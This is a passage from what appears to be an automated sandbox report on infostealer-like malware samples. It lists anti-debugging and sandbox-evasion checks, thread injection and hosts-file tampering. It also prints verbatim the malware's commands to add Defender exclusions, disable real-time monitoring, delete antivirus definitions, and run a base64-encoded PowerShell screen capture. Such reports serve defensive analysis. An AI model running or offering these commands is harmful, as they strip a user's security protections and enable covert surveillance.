Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg	Jump to behavior

Source: 47SXvEQ.exe, 47SXvEQ.exe, 00000000.00000002.1714111175.0000000001074000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 47SXvEQ.exe, 00000000.00000002.1714111175.0000000001074000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\47SXvEQ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\47SXvEQ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\47SXvEQ.exe

Thread information set: HideFromDebugger

Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\47SXvEQ.exe	Code function: 0_2_05F003DF Start: 05F003BA End: 05F00384	0_2_05F003DF
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C572C	5_2_00007FFDF10C572C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C4241	5_2_00007FFDF10C4241

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\47SXvEQ.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\47SXvEQ.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\47SXvEQ.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\47SXvEQ.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\47SXvEQ.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\47SXvEQ.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\47SXvEQ.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\47SXvEQ.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\47SXvEQ.exe	File opened: NTICE
Source: C:\Users\user\Desktop\47SXvEQ.exe	File opened: SICE
Source: C:\Users\user\Desktop\47SXvEQ.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\47SXvEQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\47SXvEQ.exe

Code function: 0_2_05EE0E98 rdtsc

0_2_05EE0E98

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 4_2_00007FF62665A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00007FF62665A684

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 5_2_00007FFDF1413230 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

5_2_00007FFDF1413230

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 4_2_00007FF6266634F0 GetProcessHeap,

4_2_00007FF6266634F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62664C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF62664C910
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62665A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF62665A684
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62664D37C SetUnhandledExceptionFilter,	4_2_00007FF62664D37C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF62664D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF62664D19C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62664C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF62664C910
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62665A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF62665A684
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62664D37C SetUnhandledExceptionFilter,	5_2_00007FF62664D37C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF62664D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF62664D19C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA30E8 IsProcessorFeaturePresent,00007FFE103019A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE103019A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDF0FA30E8
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C5A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDF10C5A1F
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE101DAA58 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFE101DAA58

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\ProgramData\Microsoft\svchost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\Microsoft\svchost.exe	Thread register set: target process: 4460
Source: C:\ProgramData\Microsoft\svchost.exe	Thread register set: target process: 7756

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
